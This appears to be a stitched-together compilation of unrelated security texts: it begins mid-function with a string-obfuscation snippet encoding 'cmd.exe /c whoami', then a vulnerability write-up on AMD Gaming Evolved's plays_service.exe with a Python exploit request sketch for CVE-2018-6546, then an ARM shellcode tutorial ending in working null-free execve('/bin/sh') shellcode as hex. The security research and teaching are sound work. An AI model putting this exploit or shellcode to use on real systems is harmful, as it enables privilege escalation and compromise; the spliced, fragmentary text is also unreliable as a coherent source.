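    return "".join(chr(ord(c) - offset) for c in "".join(chunks))

chunks = encode("cmd.exe /c whoami")
assert decode(chunks) == "cmd.exe /c whoami"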

 

AMD Gaming Evolved exploiting

Background

For anyone running an AMD GPU from a few years back, you’ve probably come across a piece of software installed on your computer from Raptr, Inc. If you don’t remember installing it, it’s because for several years it was installed silently along-side your AMD drivers. The software was marketed to the gaming community and labeled AMD Gaming Evolved. While I haven’t ever actually used the software, I’ve gathered that it allowed you to tweak your GPU as well as record your gameplay using another application called playstv.

I personally discovered the software while performing a routine check of what software running on my PC was listening for inbound connections. I try to make it a point to at least give a minimal amount of attention to any software I find accepting connections from outside of my PC. However, when I originally discovered this, my free time was scarce so I just made a note of it and uninstalled the software. The following screenshot shows the plays_service.exe binary listening on all interfaces on what appears to be an ephemeral port.

Fast forward two years: I update my AMD drivers and notice plays_service.exe has shown up on my computer again. This time I decide to give it a little more attention.

Reversing – Windows Service

Opening up plays_service.exe in IDA, we see the usual boilerplate service code and trace it down to the main entry point. From here we almost immediately recognize that this application is Python based and has been packaged with something like py2exe. While decompiling Python bytecode is rather trivial, the trick with these types of executables is identifying and locating the Python classes. Python bytecode in a py2exe packaged binary is typically embedded in the executable or loaded from some relative path on disk. At this point, I usually open up the strings subview in IDA to see if anything obvious jumps out.

I see at least a few interesting string references that are worth investigating. Several of them look like they may have something to do with the initialization of Python. The first string I track down is "Unable to create Python obj for executable name!". At first glance it appears to be an error message raised if certain Python objects aren't created properly. Scrolling up in the function it references, I see the following code.

This function appears to be the python setup routine. Returning to my list of strings, I see several references to zip.

%s%cpython%d%d.zip
zipimport
cannot import zipimport module
zipimporter

I decided to search through the install directory and see if there were any zip files present. Success: only one zip file exists and it is named python35.zip! Its filename also matches the format string of one of the string references above. I unzip the file and peruse its contents. The zip file contains thousands of compiled Python bytecode files, which I presume to be the application's core source code and library dependencies.

Reversing – Compiled Python

Looking through the compiled python files, I see three that may be the service’s source code.

I decompiled each of the files using uncompyle6 and opened them up in a text editor. The largest of the three, plays_service.pyc, turned out to be the main service source. The service is a basic HTTP server made up of a few simple classes. It binds to an ephemeral port on startup and writes the port to the registry to be used by the greater application. The POST request handler code is listed below.

The handler expects a JSON formatted POST request with a couple of parameters. The first is the data parameter, which holds the command to be processed. The second is a hash of the data provided and a secret key. Lucky for us, the secret key just so happens to be hard-coded in the class definition. If the computed hash matches the one provided, the handler calls one of two defined command functions, "extract_files" or "execute_installer". From here I began to look at the "execute_installer" function because the name sounded quite promising.

The function logic is pretty straightforward. It performs a couple of insignificant checks, resolves two paths passed as parameters to the POST request, and then calls CreateProcess. The most important detail is that while it looks like a fully controlled command injection is possible, the calls to win32api.GetShortPathName throw an exception if the parameter passed does not resolve to a file. This limits the exploitation of this vulnerability significantly but still allows for privilege escalation to SYSTEM and remote compromise using anonymous outbound SMB.

Exploit

Exploiting this “feature” for file execution didn’t take a significant amount of work. The only real requirements were properly setting up the POST request and hashing the right portion of data. A proof of concept for achieving file execution with this vulnerability (CVE-2018-6546) can be found here.
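The gist of such a request might look roughly like the Python sketch below; the parameter names, hash construction, secret and port are all assumptions for illustration, so refer to the linked PoC for the real format:

import hashlib
import json
import urllib.request

SECRET = "hardcoded-secret-from-the-class"   # placeholder, not the real key
PORT = 59999                                 # placeholder: in reality, read the port the service wrote to the registry

data = json.dumps({"installer": r"C:\path\to\payload.exe", "args": ""})
digest = hashlib.sha1((data + SECRET).encode()).hexdigest()   # assumed hashing scheme

body = json.dumps({"data": data, "hash": digest}).encode()
req = urllib.request.Request("http://127.0.0.1:%d/" % PORT, data=body,
                             headers={"Content-Type": "application/json"})
urllib.request.urlopen(req)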

WRITING ARM SHELLCODE

INTRODUCTION TO WRITING ARM SHELLCODE

 

This tutorial is for people who think beyond running automated shellcode generators and want to learn how to write shellcode in ARM assembly themselves. After all, knowing how it works under the hood and having full control over the result is much more fun than simply running a tool, isn’t it? Writing your own shellcode in assembly is a skill that can turn out to be very useful in scenarios where you need to bypass shellcode-detection algorithms or other restrictions where automated tools could turn out to be insufficient. The good news is, it’s a skill that can be learned quite easily once you are familiar with the process.

For this tutorial we will use the following tools (most of them should be installed by default on your Linux distribution):

  • GDB – our debugger of choice
  • GEF –  GDB Enhanced Features, highly recommended (created by @_hugsy_)
  • GCC – Gnu Compiler Collection
  • as – assembler
  • ld – linker
  • strace – utility to trace system calls
  • objdump – to check for null-bytes in the disassembly
  • objcopy – to extract raw shellcode from ELF binary

Make sure you compile and run all the examples in this tutorial in an ARM environment.

Before you start writing your shellcode, make sure you are aware of some basic principles, such as:

  1. You want your shellcode to be compact and free of null-bytes
    • Reason: We are writing shellcode that we will use to exploit memory corruption vulnerabilities like buffer overflows. Some buffer overflows occur because of the use of the C function ‘strcpy’. Its job is to copy data until it receives a null-byte. We use the overflow to take control over the program flow and if strcpy hits a null-byte it will stop copying our shellcode and our exploit will not work.
  2. You also want to avoid library calls and absolute memory addresses
    • Reason: To make our shellcode as universal as possible, we can’t rely on library calls that require specific dependencies and absolute memory addresses that depend on specific environments.

The Process of writing shellcode involves the following steps:

  1. Knowing what system calls you want to use
  2. Figuring out the syscall number and the parameters your chosen syscall function requires
  3. De-Nullifying your shellcode
  4. Converting your shellcode into a Hex string

UNDERSTANDING SYSTEM FUNCTIONS

Before diving into our first shellcode, let’s write a simple ARM assembly program that outputs a string. The first step is to look up the system call we want to use, which in this case is “write”. The prototype of this system call can be looked up in the Linux man pages:

ssize_t write(int fd, const void *buf, size_t count);

From the perspective of a high level programming language like C, the invocation of this system call would look like the following:

const char string[13] = "Azeria Labs\n";
write(1, string, sizeof(string));        // Here sizeof(string) is 13

Looking at this prototype, we can see that we need the following parameters:

  • fd – 1 for STDOUT
  • buf – pointer to a string
  • count – number of bytes to write -> 13
  • syscall number of write -> 0x4

For the first 3 parameters we can use R0, R1, and R2. For the syscall we need to use R7 and move the number 0x4 into it.

mov   r0, #1      @ fd 1 = STDOUT
ldr   r1, string  @ loading the string from memory to R1
mov   r2, #13     @ write 13 bytes to STDOUT 
mov   r7, #4      @ Syscall 0x4 = write()
svc   #0

Using the snippet above, a functional ARM assembly program would look like the following:

.data
string: .asciz "Azeria Labs\n"  @ .asciz adds a null-byte to the end of the string
after_string:
.set size_of_string, after_string - string

.text
.global _start

_start:
   mov r0, #1               @ STDOUT
   ldr r1, addr_of_string   @ memory address of string
   mov r2, #size_of_string  @ size of string
   mov r7, #4               @ write syscall
   swi #0                   @ invoke syscall

_exit:
   mov r7, #1               @ exit syscall
   swi 0                    @ invoke syscall

addr_of_string: .word string

In the data section we calculate the size of our string by subtracting the address at the beginning of the string from the address after the string. This, of course, is not necessary if we would just calculate the string size manually and put the result directly into R2. To exit our program we use the system call exit() which has the syscall number 1.

Compile and execute:

azeria@labs:~$ as write.s -o write.o && ld write.o -o write
azeria@labs:~$ ./write
Azeria Labs

Cool. Now that we know the process, let’s look into it in more detail and write our first simple shellcode in ARM assembly.

1. TRACING SYSTEM CALLS

For our first example we will take the following simple function and transform it into ARM assembly:

#include <stdio.h>

void main(void)
{
    system("/bin/sh");
}

The first step is to figure out what system calls this function invokes and what parameters are required by the system call. With ‘strace’ we can monitor our program’s system calls to the Kernel of the OS.

Save the code above in a file and compile it before running the strace command on it.

azeria@labs:~$ gcc system.c -o system
azeria@labs:~$ strace -h
-f -- follow forks, -ff -- with output into separate files
-v -- verbose mode: print unabbreviated argv, stat, termio[s], etc. args
--- snip --
azeria@labs:~$ strace -f -v system
--- snip --
[pid 4575] execve("/bin/sh", ["/bin/sh"], ["MAIL=/var/mail/pi", "SSH_CLIENT=192.168.200.1 42616 2"..., "USER=pi", "SHLVL=1", "OLDPWD=/home/azeria", "HOME=/home/azeria", "XDG_SESSION_COOKIE=34069147acf8a"..., "SSH_TTY=/dev/pts/1", "LOGNAME=pi", "_=/usr/bin/strace", "TERM=xterm", "PATH=/usr/local/sbin:/usr/local/"..., "LANG=en_US.UTF-8", "LS_COLORS=rs=0:di=01;34:ln=01;36"..., "SHELL=/bin/bash", "EGG=AAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., "LC_ALL=en_US.UTF-8", "PWD=/home/azeria/", "SSH_CONNECTION=192.168.200.1 426"...]) = 0
--- snip --
[pid 4575] write(2, "$ ", 2$ ) = 2
[pid 4575] read(0, exit
--- snip --
exit_group(0) = ?
+++ exited with 0 +++

Turns out, the system function execve() is being invoked.

2. SYSCALL NUMBER AND PARAMETERS

The next step is to figure out the syscall number of execve() and the parameters this function requires. You can get a nice overview of system calls at w3calls or by searching through Linux man pages. Here’s what we get from the man page of execve():

NAME
    execve - execute program
SYNOPSIS

    #include <unistd.h>

    int  execve(const char *filename, char *const argv [], char *const envp[]);

The parameters execve() requires are:

  • Pointer to a string specifying the path to a binary
  • argv[] – array of command line variables
  • envp[] – array of environment variables

Which basically translates to: execve(*filename, *argv[], *envp[]) –> execve(*filename, 0, 0). The system call number of this function can be looked up with the following command:

azeria@labs:~$ grep execve /usr/include/arm-linux-gnueabihf/asm/unistd.h 
#define __NR_execve (__NR_SYSCALL_BASE+ 11)

Looking at the output you can see that the syscall number of execve() is 11. Registers R0 to R2 can be used for the function parameters and register R7 will store the syscall number.

Invoking system calls on x86 works as follows: First, you PUSH parameters on the stack. Then, the syscall number gets moved into EAX (MOV EAX, syscall_number). And lastly, you invoke the system call with SYSENTER / INT 80.

On ARM, syscall invocation works a little bit differently:

  1. Move parameters into registers – R0, R1, ..
  2. Move the syscall number into register R7
    • mov  r7, #<syscall_number>
  3. Invoke the system call with
    • SVC #0 or
    • SVC #1
  4. The return value ends up in R0

This is how it looks like in ARM Assembly (Code uploaded to the azeria-labs Github account):

As you can see in the picture above, we start by pointing R0 to our "/bin/sh" string using PC-relative addressing (if you can't remember why the effective PC starts two instructions ahead of the current one, go to 'Data Types and Registers' of the assembly basics tutorial and look at the part where the PC register is explained along with an example). Then we move 0's into R1 and R2 and move the syscall number 11 into R7. Looks easy, right? Let's look at the disassembly of our first attempt using objdump:

azeria@labs:~$ as execve1.s -o execve1.o
azeria@labs:~$ objdump -d execve1.o
execve1.o: file format elf32-littlearm

Disassembly of section .text:

00000000 <_start>:
 0: e28f000c add r0, pc, #12
 4: e3a01000 mov r1, #0
 8: e3a02000 mov r2, #0
 c: e3a0700b mov r7, #11
 10: ef000000 svc 0x00000000
 14: 6e69622f .word 0x6e69622f
 18: 0068732f .word 0x0068732f

Turns out we have quite a lot of null-bytes in our shellcode. The next step is to de-nullify the shellcode and replace all operations that introduce them.
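A quick Python helper (not part of the original tutorial) makes it easy to count the null-bytes in an object file or raw shellcode, so you can verify the de-nullified version later:

import sys

data = open(sys.argv[1], "rb").read()
print("total bytes:", len(data))
print("null bytes :", data.count(b"\x00"))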

3. DE-NULLIFYING SHELLCODE

One of the techniques we can use to make null-bytes less likely to appear in our shellcode is to use Thumb mode. Using Thumb mode decreases the chances of having null-bytes, because Thumb instructions are 2 bytes long instead of 4. If you went through the ARM Assembly Basics tutorials you know how to switch from ARM to Thumb mode. If you haven’t I encourage you to read the chapter about the branching instructions “B / BX / BLX” in part 6 of the tutorial “Conditional Execution and Branching“.

In our second attempt we use Thumb mode and replace the operations containing #0’s with operations that result in 0’s by subtracting registers from each other or xor’ing them. For example, instead of using “mov  r1, #0”, use either “sub  r1, r1, r1” (r1 = r1 – r1) or “eor  r1, r1, r1” (r1 = r1 xor r1). Keep in mind that since we are now using Thumb mode (2 byte instructions) and our code must be 4 byte aligned, we need to add a NOP at the end (e.g. mov  r5, r5).

(Code available on the azeria-labs Github account):

The disassembled code looks like the following:

The result is that we only have one single null-byte that we need to get rid of. The part of our code that’s causing the null-byte is the null-terminated string “/bin/sh\0”. We can solve this issue with the following technique:

  • Replace “/bin/sh\0” with “/bin/shX”
  • Use the instruction strb (store byte) in combination with an existing zero-filled register to replace X with a null-byte

(Code available on the azeria-labs Github account):

Voilà – no null-bytes!

4. TRANSFORM SHELLCODE INTO HEX STRING

The shellcode we created can now be transformed into its hexadecimal representation. Before doing that, it is a good idea to check that the shellcode works standalone. But there's a problem: if we compile our assembly file as we normally would, it won't work. The reason is that we use the strb operation to modify our code section (.text). This requires the code section to be writable, which can be achieved by adding the -N flag during the linking process.

azeria@labs:~$ ld --help
--- snip --
-N, --omagic        Do not page align data, do not make text readonly.
--- snip -- 
azeria@labs:~$ as execve3.s -o execve3.o && ld -N execve3.o -o execve3
azeria@labs:~$ ./execve3
$ whoami
azeria

It works! Congratulations, you’ve written your first shellcode in ARM assembly.

To convert it into hex, use the following commands:

azeria@labs:~$ objcopy -O binary execve3 execve3.bin 
azeria@labs:~$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' execve3.bin 
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78

Instead of using the hexdump command above, you can also do the same with a simple Python script:

#!/usr/bin/env python

import sys

binary = open(sys.argv[1],'rb')

for byte in binary.read():
 sys.stdout.write("\\x"+byte.encode("hex"))

print ""
azeria@labs:~$ ./shellcode.py execve3.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78

I hope you enjoyed this introduction to writing ARM shellcode. In the next part you will learn how to write shellcode in the form of a reverse shell, which is a little more complicated than the example above. After that we will dive into memory corruptions and learn how they occur and how to exploit them using our self-made shellcode.